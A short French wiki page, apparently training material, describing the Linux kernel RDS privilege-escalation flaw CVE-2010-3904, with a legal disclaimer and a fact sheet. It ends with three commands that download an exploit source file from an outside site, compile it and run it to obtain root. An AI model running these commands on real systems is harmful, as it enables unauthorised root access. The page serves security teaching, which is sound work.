RDS

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit un exploit d'élévation de privilèges noyau à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Fiche express
CVE CVE-2010-3904
Type Elevation de privileges locale (root)
Cause Defaut de verification dans le protocole RDS du noyau
Cibles Noyaux Linux 2.6.30 a 2.6.36

L'exploit RDS (Reliable Datagram Sockets, CVE-2010-3904) est un local root du noyau Linux affectant les versions 2.6.30 a 2.6.36, dues a un defaut de controle des acces memoire dans le module RDS.

Faille RDS (Reliable Datagram Sockets)

La vulnérabilité concerne les versions 2.6.30 à 2.6.36 du kernel.

wget www.tux-planet.fr/public/hack/exploits/kernel/linux-rds-exploit.c
gcc -o linux-rds linux-rds-exploit.c 
./linux-rds

Voir aussi